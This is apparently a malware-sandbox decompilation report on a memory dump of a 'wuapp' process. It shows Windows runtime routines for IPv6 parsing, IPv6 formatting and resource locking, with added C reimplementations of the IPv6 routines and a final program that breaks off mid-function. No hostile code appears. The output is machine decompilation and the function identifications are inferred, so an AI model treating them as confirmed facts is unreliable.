                                                        										goto L28;
                                                        									}
                                                        									_v8 = _v8 + 1;
                                                        									goto L27;
                                                        								}
                                                        							} else {
                                                        								_v12 = _v12 + 1;
                                                        								if(_v24 > 0) {
                                                        									goto L41;
                                                        								}
                                                        								_a7 = 1;
                                                        								goto L20;
                                                        							}
                                                        						} else {
                                                        							_v12 = _v12 + 1;
                                                        							L20:
                                                        							_t179 = _t179 + 1;
                                                        							_t141 =  *_t179;
                                                        							if(_t141 == 0) {
                                                        								goto L41;
                                                        							}
                                                        							continue;
                                                        						}
                                                        						L7:
                                                        						if(_t141 == 0x3a) {
                                                        							if(_v24 > 0 || _v8 > 0) {
                                                        								goto L41;
                                                        							} else {
                                                        								_t130 = _t179 + 1;
                                                        								if( *_t130 != _t141) {
                                                        									goto L41;
                                                        								}
                                                        								_v20 = _v20 + 1;
                                                        								_t156 = 2;
                                                        								_v32 = 1;
                                                        								_v8 = _t156;
                                                        								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                        								goto L34;
                                                        							}
                                                        						}
                                                        						L8:
                                                        						if(_v8 > 7) {
                                                        							goto L41;
                                                        						}
                                                        						_t142 = _t141;
                                                        						if(E01EE06BA(_t123, _t141) == 0 || _t124 == 0) {
                                                        							if(E01EE06BA(_t124, _t142) == 0 || E01EE0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                        								goto L41;
                                                        							} else {
                                                        								_t128 = 1;
                                                        								_a7 = 1;
                                                        								_v28 = _t179;
                                                        								_v16 = 1;
                                                        								_v12 = 1;
                                                        								L39:
                                                        								if(_v16 == _t128) {
                                                        									goto L20;
                                                        								}
                                                        								goto L28;
                                                        							}
                                                        						} else {
                                                        							_a7 = 0;
                                                        							_v28 = _t179;
                                                        							_v16 = 1;
                                                        							_v12 = 1;
                                                        							goto L20;
                                                        						}
                                                        					}
                                                        				}
                                                        				L1:
                                                        				_t123 = _t108 == 1;
                                                        				if(_t108 == 1) {
                                                        					goto L8;
                                                        				}
                                                        				_t128 = 1;
                                                        				goto L39;
                                                        			}
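The function above is a character-at-a-time state machine over the grammar of an IPv6 address string: up to eight 16-bit hex groups separated by ':', a single "::" standing for a run of zero groups, an optional dotted-decimal IPv4 tail in the last two groups, and 0xc000000d for anything that breaks those bounds. The bounds are the security-relevant part: the group count, the digits-per-group limit and the octet <= 0xff check are what keep the 16-byte output in range while the input is attacker-controlled text. The following C implementation of the same grammar is an added example, not code from the report or from ntdll, and is my own clean-room version; it assumes the identification of the decompiled function as an IPv6 parser (inferred from the constants above, not confirmed by the report), mirrors only the 0xc000000d failure code and the terminator-pointer convention, and may be stricter than the Windows parser in edge cases (for instance it rejects a dangling ':' outright). The helper names and the sample inputs in the usage note are constructed for this example.

```c
#include <ctype.h>
#include <stdint.h>
#include <string.h>

/* NTSTATUS values; 0xc000000d is the failure code the decompiled function returns. */
#define STATUS_SUCCESS           0x00000000u
#define STATUS_INVALID_PARAMETER 0xC000000Du

static int hexval(int c)
{
    return (c >= '0' && c <= '9') ? c - '0' : tolower(c) - 'a' + 10;
}

/* Parse a textual IPv6 address into 16 network-order bytes.
 * Grammar: up to 8 groups of 1-4 hex digits separated by ':', at most one "::"
 * standing for one or more zero groups, and an optional dotted-decimal IPv4
 * tail occupying the last two groups. Parsing stops at the first character
 * that cannot belong to the address and reports it through *end, the way the
 * decompiled function writes its terminator pointer back through _a8. */
uint32_t ipv6_from_string(const char *s, uint8_t out[16], const char **end)
{
    uint16_t groups[8] = {0};
    int ngroups = 0;                 /* groups stored so far (max 8) */
    int zrun = -1;                   /* group index where "::" was seen, -1 if none */
    const char *p = s;

    if (*p == ':') {                 /* a leading ':' is only legal as "::" */
        if (p[1] != ':') return STATUS_INVALID_PARAMETER;
        zrun = 0;
        p += 2;
    }
    while (*p && ngroups < 8) {
        int ndig = 0;
        while (isxdigit((unsigned char)p[ndig])) ndig++;
        if (ndig == 0) break;        /* terminator reached */

        if (p[ndig] == '.') {        /* embedded IPv4 tail: must land in the last two groups */
            if (ngroups > 6 || (zrun < 0 && ngroups != 6)) return STATUS_INVALID_PARAMETER;
            unsigned v[4];
            for (int i = 0; i < 4; i++) {
                unsigned val = 0; int n = 0;
                while (isdigit((unsigned char)*p) && n < 4) { val = val * 10 + (unsigned)(*p++ - '0'); n++; }
                if (n == 0 || n > 3 || val > 255) return STATUS_INVALID_PARAMETER;   /* octet > 0xff */
                if (i < 3 && *p++ != '.') return STATUS_INVALID_PARAMETER;
                v[i] = val;
            }
            groups[ngroups++] = (uint16_t)(v[0] << 8 | v[1]);
            groups[ngroups++] = (uint16_t)(v[2] << 8 | v[3]);
            break;                   /* nothing may follow the IPv4 tail */
        }
        if (ndig > 4) return STATUS_INVALID_PARAMETER;      /* group wider than 16 bits */
        unsigned val = 0;
        for (int i = 0; i < ndig; i++) val = val * 16 + (unsigned)hexval(p[i]);
        groups[ngroups++] = (uint16_t)val;
        p += ndig;

        if (*p != ':') break;        /* terminator reached */
        if (ngroups == 8) return STATUS_INVALID_PARAMETER;  /* a 9th group would follow */
        if (p[1] == ':') {           /* "::" is allowed once */
            if (zrun >= 0) return STATUS_INVALID_PARAMETER;
            zrun = ngroups;
            p += 2;
        } else {
            p += 1;
            if (!isxdigit((unsigned char)*p)) return STATUS_INVALID_PARAMETER;   /* dangling ':' */
        }
    }
    if (zrun < 0) {
        if (ngroups != 8) return STATUS_INVALID_PARAMETER;  /* too few groups and no "::" */
    } else {
        if (ngroups == 8) return STATUS_INVALID_PARAMETER;  /* "::" must stand for >= 1 group */
        int tail = ngroups - zrun;                          /* groups seen after "::" */
        /* Shift the tail to the end and zero-fill the gap; the memmove/memset pair
         * at the end of the decompiled function does the same for its output. */
        memmove(&groups[8 - tail], &groups[zrun], (size_t)tail * sizeof groups[0]);
        memset(&groups[zrun], 0, (size_t)(8 - ngroups) * sizeof groups[0]);
    }
    for (int i = 0; i < 8; i++) {
        out[2 * i]     = (uint8_t)(groups[i] >> 8);
        out[2 * i + 1] = (uint8_t)(groups[i] & 0xff);
    }
    if (end) *end = p;
    return STATUS_SUCCESS;
}

/* Status only, for callers that just want accept/reject. */
uint32_t ipv6_status(const char *s)
{
    uint8_t a[16];
    return ipv6_from_string(s, a, NULL);
}

/* 1 if s parses, its bytes equal the 32-digit hex string, and parsing stopped at expect_stop. */
int ipv6_matches(const char *s, const char *hex32, char expect_stop)
{
    uint8_t a[16]; const char *end = NULL;
    if (ipv6_from_string(s, a, &end) != STATUS_SUCCESS || *end != expect_stop) return 0;
    for (int i = 0; i < 16; i++)
        if (a[i] != (uint8_t)(hexval(hex32[2 * i]) * 16 + hexval(hex32[2 * i + 1]))) return 0;
    return 1;
}
```

Typical calls: ipv6_from_string("2001:db8::1", buf, &end) fills buf with 20 01 0d b8 00 .. 00 01 and leaves end at the NUL; "fe80::1%eth0" parses the same way with end pointing at the '%', which is how a caller can pick up a scope suffix; "1:2:3:4:5:6:7:8:9", "::1::2", "12345::" and "::ffff:1.2.3.256" each return STATUS_INVALID_PARAMETER from one of the bounds checks marked in the comments. Those checks correspond to the _v8 > 7, _v32 != 0, _v12 > 4 and > 0xff comparisons in the decompiled function.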

                                                        Address column of the decompilation view: instruction addresses in the ranges 0x01ee0a0f to 0x01ee0cec and 0x01f0eaaa to 0x01f0eba6 (0x00000000 for lines without an address of their own).
                                                        0x01ee0c1d
                                                        0x01ee0c20
                                                        0x01ee0c21
                                                        0x01ee0c24
                                                        0x01ee0c24
                                                        0x01ee0c26
                                                        0x00000000
                                                        0x01ee0c26
                                                        0x01ee0bcd
                                                        0x00000000
                                                        0x01ee0bcd
                                                        0x01ee0b89
                                                        0x01ee0b89
                                                        0x01ee0b90
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0b96
                                                        0x00000000
                                                        0x01ee0b96
                                                        0x01ee0a04
                                                        0x01ee0a04
                                                        0x01ee0b9a
                                                        0x01ee0b9a
                                                        0x01ee0b9b
                                                        0x01ee0b9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0ba5
                                                        0x01ee0ac7
                                                        0x01ee0aca
                                                        0x01f0eacf
                                                        0x00000000
                                                        0x01f0eade
                                                        0x01f0eade
                                                        0x01f0eae3
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0eaf3
                                                        0x01f0eaf6
                                                        0x01f0eaf7
                                                        0x01f0eafe
                                                        0x01f0eb01
                                                        0x00000000
                                                        0x01f0eb01
                                                        0x01f0eacf
                                                        0x01ee0ad0
                                                        0x01ee0ad4
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0ada
                                                        0x01ee0ae6
                                                        0x01ee0c34
                                                        0x00000000
                                                        0x01ee0c47
                                                        0x01ee0c49
                                                        0x01ee0c4a
                                                        0x01ee0c4e
                                                        0x01ee0c51
                                                        0x01ee0c54
                                                        0x01ee0c57
                                                        0x01ee0c5a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0c60
                                                        0x01ee0afb
                                                        0x01ee0afe
                                                        0x01ee0b02
                                                        0x01ee0b05
                                                        0x01ee0b08
                                                        0x00000000
                                                        0x01ee0b08
                                                        0x01ee0ae6
                                                        0x01ee0b44
                                                        0x01ee09f8
                                                        0x01ee09f8
                                                        0x01ee09f9
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0eaa0
                                                        0x00000000

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: __fassign
                                                        • String ID: .$:$:
                                                        • API String ID: 3965848254-2308638275
                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction ID: 2a4fa77cd7d837edd43decadca660daddf9a53e0aaf82d92ceb2b8c5c8b3ee2c
                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction Fuzzy Hash: FFA1AF71E0034ADADF29CF68D8497BEBBF4BF04708F24A46AE506A7281D7B09651CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 50%
                                                        			E01EE0554(signed int _a4, char _a8) {
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int* _t49;
                                                        				signed int _t51;
                                                        				signed int _t56;
                                                        				signed int _t58;
                                                        				signed int _t61;
                                                        				signed int _t63;
                                                        				void* _t66;
                                                        				intOrPtr _t67;
                                                        				void* _t69;
                                                        				signed int _t70;
                                                        				void* _t75;
                                                        				signed int _t81;
                                                        				signed int _t84;
                                                        				void* _t86;
                                                        				signed int _t93;
                                                        				signed int _t96;
                                                        				intOrPtr _t105;
                                                        				signed int _t107;
                                                        				void* _t110;
                                                        				signed int _t115;
                                                        				signed int* _t119;
                                                        				void* _t125;
                                                        				void* _t126;
                                                        				signed int _t128;
                                                        				signed int _t130;
                                                        				signed int _t138;
                                                        				signed int _t144;
                                                        				void* _t158;
                                                        				void* _t159;
                                                        				void* _t160;
                                                        
                                                        				_t96 = _a4;
                                                        				_t115 =  *(_t96 + 0x28);
                                                        				_push(_t138);
                                                        				if(_t115 < 0) {
                                                        					_t105 =  *[fs:0x18];
                                                        					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                        					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                        						goto L6;
                                                        					} else {
                                                        						__eflags = _t115 | 0xffffffff;
                                                        						asm("lock xadd [eax], edx");
                                                        						return 1;
                                                        					}
                                                        				} else {
                                                        					L6:
                                                        					_push(_t128);
                                                        					while(1) {
                                                        						L7:
                                                        						__eflags = _t115;
                                                        						if(_t115 >= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _a8;
                                                        						if(_a8 == 0) {
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						} else {
                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                        							_t49 = _t96 + 0x1c;
                                                        							_t106 = 1;
                                                        							asm("lock xadd [edx], ecx");
                                                        							_t115 =  *(_t96 + 0x28);
                                                        							__eflags = _t115;
                                                        							if(_t115 < 0) {
                                                        								L23:
                                                        								_t130 = 0;
                                                        								__eflags = 0;
                                                        								while(1) {
                                                        									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                        									asm("sbb esi, esi");
                                                        									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01f801c0;
                                                        									_push(_t144);
                                                        									_push(0);
                                                        									_t51 = E01E9F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                        									__eflags = _t51 - 0x102;
                                                        									if(_t51 != 0x102) {
                                                        										break;
                                                        									}
                                                        									_t106 =  *(_t144 + 4);
                                                        									_t126 =  *_t144;
                                                        									_t86 = E01EE4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                        									_push(_t126);
                                                        									_push(_t86);
                                                        									E01EF3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                        									E01EF3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                        									_t130 = _t130 + 1;
                                                        									_t160 = _t158 + 0x28;
                                                        									__eflags = _t130 - 2;
                                                        									if(__eflags > 0) {
                                                        										E01F2217A(_t106, __eflags, _t96);
                                                        									}
                                                        									_push("RTL: Re-Waiting\n");
                                                        									_push(0);
                                                        									_push(0x65);
                                                        									E01EF3F92();
                                                        									_t158 = _t160 + 0xc;
                                                        								}
                                                        								__eflags = _t51;
                                                        								if(__eflags < 0) {
                                                        									_push(_t51);
                                                        									E01EE3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                        									asm("int3");
                                                        									while(1) {
                                                        										L32:
                                                        										__eflags = _a8;
                                                        										if(_a8 == 0) {
                                                        											break;
                                                        										}
                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                        										_t119 = _t96 + 0x24;
                                                        										_t107 = 1;
                                                        										asm("lock xadd [eax], ecx");
                                                        										_t56 =  *(_t96 + 0x28);
                                                        										_a4 = _t56;
                                                        										__eflags = _t56;
                                                        										if(_t56 != 0) {
                                                        											L40:
                                                        											_t128 = 0;
                                                        											__eflags = 0;
                                                        											while(1) {
                                                        												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                        												asm("sbb esi, esi");
                                                        												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01f801c0;
                                                        												_push(_t138);
                                                        												_push(0);
                                                        												_t58 = E01E9F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                        												__eflags = _t58 - 0x102;
                                                        												if(_t58 != 0x102) {
                                                        													break;
                                                        												}
                                                        												_t107 =  *(_t138 + 4);
                                                        												_t125 =  *_t138;
                                                        												_t75 = E01EE4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                        												_push(_t125);
                                                        												_push(_t75);
                                                        												E01EF3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                        												E01EF3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                        												_t128 = _t128 + 1;
                                                        												_t159 = _t158 + 0x28;
                                                        												__eflags = _t128 - 2;
                                                        												if(__eflags > 0) {
                                                        													E01F2217A(_t107, __eflags, _t96);
                                                        												}
                                                        												_push("RTL: Re-Waiting\n");
                                                        												_push(0);
                                                        												_push(0x65);
                                                        												E01EF3F92();
                                                        												_t158 = _t159 + 0xc;
                                                        											}
                                                        											__eflags = _t58;
                                                        											if(__eflags < 0) {
                                                        												_push(_t58);
                                                        												E01EE3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                        												asm("int3");
                                                        												_t61 =  *_t107;
                                                        												 *_t107 = 0;
                                                        												__eflags = _t61;
                                                        												if(_t61 == 0) {
                                                        													L1:
                                                        													_t63 = E01EC5384(_t138 + 0x24);
                                                        													if(_t63 != 0) {
                                                        														goto L52;
                                                        													} else {
                                                        														goto L2;
                                                        													}
                                                        												} else {
                                                        													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                        													_push( &_a4);
                                                        													_push(_t61);
                                                        													_t70 = E01E9F970( *((intOrPtr*)(_t138 + 0x18)));
                                                        													__eflags = _t70;
                                                        													if(__eflags >= 0) {
                                                        														goto L1;
                                                        													} else {
                                                        														_push(_t70);
                                                        														E01EE3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                        														L52:
                                                        														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                        														_push( &_a4);
                                                        														_push(1);
                                                        														_t63 = E01E9F970( *((intOrPtr*)(_t138 + 0x20)));
                                                        														__eflags = _t63;
                                                        														if(__eflags >= 0) {
                                                        															L2:
                                                        															return _t63;
                                                        														} else {
                                                        															_push(_t63);
                                                        															E01EE3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                        															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                        															_push( &_a4);
                                                        															_push(1);
                                                        															_t63 = E01E9F970( *((intOrPtr*)(_t138 + 0x20)));
                                                        															__eflags = _t63;
                                                        															if(__eflags >= 0) {
                                                        																goto L2;
                                                        															} else {
                                                        																_push(_t63);
                                                        																_t66 = E01EE3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                        																asm("int3");
                                                        																while(1) {
                                                        																	_t110 = _t66;
                                                        																	__eflags = _t66 - 1;
                                                        																	if(_t66 != 1) {
                                                        																		break;
                                                        																	}
                                                        																	_t128 = _t128 | 0xffffffff;
                                                        																	_t66 = _t110;
                                                        																	asm("lock cmpxchg [ebx], edi");
                                                        																	__eflags = _t66 - _t110;
                                                        																	if(_t66 != _t110) {
                                                        																		continue;
                                                        																	} else {
                                                        																		_t67 =  *[fs:0x18];
                                                        																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                        																		return _t67;
                                                        																	}
                                                        																	goto L59;
                                                        																}
                                                        																E01EC5329(_t110, _t138);
                                                        																_t69 = E01EC53A5(_t138, 1);
                                                        																return _t69;
                                                        															}
                                                        														}
                                                        													}
                                                        												}
                                                        											} else {
                                                        												_t56 =  *(_t96 + 0x28);
                                                        												goto L3;
                                                        											}
                                                        										} else {
                                                        											_t107 =  *_t119;
                                                        											__eflags = _t107;
                                                        											if(__eflags > 0) {
                                                        												while(1) {
                                                        													_t81 = _t107;
                                                        													asm("lock cmpxchg [edi], esi");
                                                        													__eflags = _t81 - _t107;
                                                        													if(_t81 == _t107) {
                                                        														break;
                                                        													}
                                                        													_t107 = _t81;
                                                        													__eflags = _t81;
                                                        													if(_t81 > 0) {
                                                        														continue;
                                                        													}
                                                        													break;
                                                        												}
                                                        												_t56 = _a4;
                                                        												__eflags = _t107;
                                                        											}
                                                        											if(__eflags != 0) {
                                                        												while(1) {
                                                        													L3:
                                                        													__eflags = _t56;
                                                        													if(_t56 != 0) {
                                                        														goto L32;
                                                        													}
                                                        													_t107 = _t107 | 0xffffffff;
                                                        													_t56 = 0;
                                                        													asm("lock cmpxchg [edx], ecx");
                                                        													__eflags = 0;
                                                        													if(0 != 0) {
                                                        														continue;
                                                        													} else {
                                                        														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                        														return 1;
                                                        													}
                                                        													goto L59;
                                                        												}
                                                        												continue;
                                                        											} else {
                                                        												goto L40;
                                                        											}
                                                        										}
                                                        										goto L59;
                                                        									}
                                                        									__eflags = 0;
                                                        									return 0;
                                                        								} else {
                                                        									_t115 =  *(_t96 + 0x28);
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								_t106 =  *_t49;
                                                        								__eflags = _t106;
                                                        								if(__eflags > 0) {
                                                        									while(1) {
                                                        										_t93 = _t106;
                                                        										asm("lock cmpxchg [edi], esi");
                                                        										__eflags = _t93 - _t106;
                                                        										if(_t93 == _t106) {
                                                        											break;
                                                        										}
                                                        										_t106 = _t93;
                                                        										__eflags = _t93;
                                                        										if(_t93 > 0) {
                                                        											continue;
                                                        										}
                                                        										break;
                                                        									}
                                                        									__eflags = _t106;
                                                        								}
                                                        								if(__eflags != 0) {
                                                        									continue;
                                                        								} else {
                                                        									goto L23;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L59;
                                                        					}
                                                        					_t84 = _t115;
                                                        					asm("lock cmpxchg [esi], ecx");
                                                        					__eflags = _t84 - _t115;
                                                        					if(_t84 != _t115) {
                                                        						_t115 = _t84;
                                                        						goto L7;
                                                        					} else {
                                                        						return 1;
                                                        					}
                                                        				}
                                                        				L59:
                                                        			}

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F02206
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-4236105082
                                                        • Opcode ID: 5a57b996eb6ec08281a5615ab8b8e086c0141f02edd8191760e3815219816ab5
                                                        • Instruction ID: 72ceabc3cc8628e4a72b636c4942a9702b677b7f92a2c18d924f0937e509de8f
                                                        • Opcode Fuzzy Hash: 5a57b996eb6ec08281a5615ab8b8e086c0141f02edd8191760e3815219816ab5
                                                        • Instruction Fuzzy Hash: 6E513D35B00252ABEB168A18DC85F9A73AAAF94710F255219FD44DF2C5EA72EC4187A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E01EE14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                        				signed int _v8;
                                                        				char _v10;
                                                        				char _v140;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t24;
                                                        				void* _t26;
                                                        				signed int _t29;
                                                        				signed int _t34;
                                                        				signed int _t40;
                                                        				intOrPtr _t45;
                                                        				void* _t51;
                                                        				intOrPtr* _t52;
                                                        				void* _t54;
                                                        				signed int _t57;
                                                        				void* _t58;
                                                        
                                                        				_t51 = __edx;
                                                        				_t24 =  *0x1f82088; // 0x76a06099
                                                        				_v8 = _t24 ^ _t57;
                                                        				_t45 = _a16;
                                                        				_t53 = _a4;
                                                        				_t52 = _a20;
                                                        				if(_a4 == 0 || _t52 == 0) {
                                                        					L10:
                                                        					_t26 = 0xc000000d;
                                                        				} else {
                                                        					if(_t45 == 0) {
                                                        						if( *_t52 == _t45) {
                                                        							goto L3;
                                                        						} else {
                                                        							goto L10;
                                                        						}
                                                        					} else {
                                                        						L3:
                                                        						_t28 =  &_v140;
                                                        						if(_a12 != 0) {
                                                        							_push("[");
                                                        							_push(0x41);
                                                        							_push( &_v140);
                                                        							_t29 = E01ED7707();
                                                        							_t58 = _t58 + 0xc;
                                                        							_t28 = _t57 + _t29 * 2 - 0x88;
                                                        						}
                                                        						_t54 = E01EE13CB(_t53, _t28);
                                                        						if(_a8 != 0) {
                                                        							_t34 = E01ED7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                        							_t58 = _t58 + 0x10;
                                                        							_t54 = _t54 + _t34 * 2;
                                                        						}
                                                        						if(_a12 != 0) {
                                                        							_t40 = E01ED7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                        							_t58 = _t58 + 0x10;
                                                        							_t54 = _t54 + _t40 * 2;
                                                        						}
                                                        						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                        						 *_t52 = _t53;
                                                        						if( *_t52 < _t53) {
                                                        							goto L10;
                                                        						} else {
                                                        							E01EA2340(_t45,  &_v140, _t53 + _t53);
                                                        							_t26 = 0;
                                                        						}
                                                        					}
                                                        				}
                                                        				return E01EAE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                        			}
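The routine above builds an address string, appends `%scope` when a scope id is given (the `L"%%%u"` format), wraps the address in brackets and appends `]:port` when a port is given (the `L"]:%u"` format), and enforces a size-query contract: the address and length pointers are mandatory, a NULL output buffer is accepted only when `*length` is 0, the length needed (terminator included) is written back through the length pointer, and 0xc000000d (STATUS_INVALID_PARAMETER) is returned when the caller's buffer is too small. The following C program is an added illustration of that contract, not code from the sample or from Windows: the RFC 4291 `::` compression, the host-order port, the constructed sample addresses and the helper names are this example's own assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 0xC000000D is the STATUS_INVALID_PARAMETER value the decompiled routine returns. */
#define STATUS_SUCCESS           0x00000000u
#define STATUS_INVALID_PARAMETER 0xC000000Du

/* Constructed sample addresses for the demo; not taken from the analysed sample. */
const uint8_t SAMPLE_LOOPBACK[16]  = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1};
const uint8_t SAMPLE_LINKLOCAL[16] = {0xfe,0x80,0,0,0,0,0,0,0,0,0,0,0,0,0,1};
const uint8_t SAMPLE_DOC[16]       = {0x20,0x01,0x0d,0xb8,0,0,0,0,0,0,0xff,0x00,0x00,0x42,0x83,0x29};

/* Text form of the 16 address bytes: eight hex groups, the longest run of two or more
   zero groups collapsed to "::" (the first run wins a tie). Returns characters written. */
static int fmt_ipv6(const uint8_t a[16], char *out, size_t cap)
{
    uint16_t h[8];
    int i, n = 0, best = -1, best_len = 0;

    for (i = 0; i < 8; i++)
        h[i] = (uint16_t)((a[2 * i] << 8) | a[2 * i + 1]);
    for (i = 0; i < 8; ) {                       /* find the longest zero run */
        int j = i;
        while (j < 8 && h[j] == 0) j++;
        if (j - i > best_len) { best = i; best_len = j - i; }
        i = (j == i) ? i + 1 : j;
    }
    if (best_len < 2) best = -1;                 /* a single zero group is not compressed */

    for (i = 0; i < 8; i++) {
        if (i == best) {
            n += snprintf(out + n, cap - n, "::");
            i += best_len - 1;
            continue;
        }
        n += snprintf(out + n, cap - n, "%x", (unsigned)h[i]);
        if (i != 7 && i + 1 != best)
            n += snprintf(out + n, cap - n, ":");
    }
    return n;
}

/* Mirrors the decompiled routine's argument checks and two-call length protocol. The
   port is taken in host byte order (an assumption of this example). */
uint32_t ipv6_to_string_ex(const uint8_t *addr, uint32_t scope_id, uint16_t port,
                           char *buf, size_t *length)
{
    char tmp[80];                                /* the decompile uses a 0x88-byte local */
    size_t n = 0, needed;

    if (addr == NULL || length == NULL) return STATUS_INVALID_PARAMETER;
    if (buf == NULL && *length != 0)    return STATUS_INVALID_PARAMETER;   /* NULL buffer only as size query */

    if (port) tmp[n++] = '[';                    /* "[" is pushed first when a port is present */
    n += (size_t)fmt_ipv6(addr, tmp + n, sizeof tmp - n);
    if (scope_id) n += (size_t)snprintf(tmp + n, sizeof tmp - n, "%%%u", scope_id);  /* L"%%%u" */
    if (port)     n += (size_t)snprintf(tmp + n, sizeof tmp - n, "]:%u", port);      /* L"]:%u" */
    needed = n + 1;                              /* characters plus terminator */

    if (*length < needed) { *length = needed; return STATUS_INVALID_PARAMETER; }
    memcpy(buf, tmp, needed);
    *length = needed;
    return STATUS_SUCCESS;
}

/* Size query first, the way a caller is expected to use the protocol. */
size_t required_length(const uint8_t *addr, uint32_t scope_id, uint16_t port)
{
    size_t len = 0;
    ipv6_to_string_ex(addr, scope_id, port, NULL, &len);   /* NULL buffer + 0 length = query */
    return len;
}

/* Self-check helper: 1 if the routine yields `expected` for these inputs, else 0. */
int formats_as(const uint8_t *addr, uint32_t scope_id, uint16_t port, const char *expected)
{
    char buf[64];
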